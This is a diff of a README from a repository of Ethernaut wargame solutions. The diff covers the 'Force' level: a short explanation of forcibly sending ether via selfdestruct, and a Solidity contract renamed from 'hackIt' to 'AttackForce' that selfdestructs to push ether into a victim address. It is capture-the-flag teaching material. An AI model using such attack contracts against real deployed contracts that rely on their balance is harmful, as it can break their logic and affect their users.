AIT-S/Ethernaut-Solutions/README.md

 ```

 ## 7. Force
-Even though your contract may not have a payable fallback function, you can still force ether transfers into your contract via selfdestruct or transaction fee rewards for mining a block.
-Do not ever assume that your contract will always have 0 balance and use it as part of validation.
+You can easily forcibly send ether to a contract.
+Read [this](https://consensys.github.io/smart-contract-best-practices/known_attacks/#forcibly-sending-ether-to-a-contract) to learn more.
 ```
-pragma solidity ^0.4.24;
+pragma solidity ^0.6.0;

-contract hackIt {
+contract AttackForce {

-    address private _victim;

-    constructor(address victim) public payable {
+    constructor(address payable _victim) public payable {
-        _victim = victim;
-    }

-    function forceTransfer() public {
         selfdestruct(_victim);
     }
 }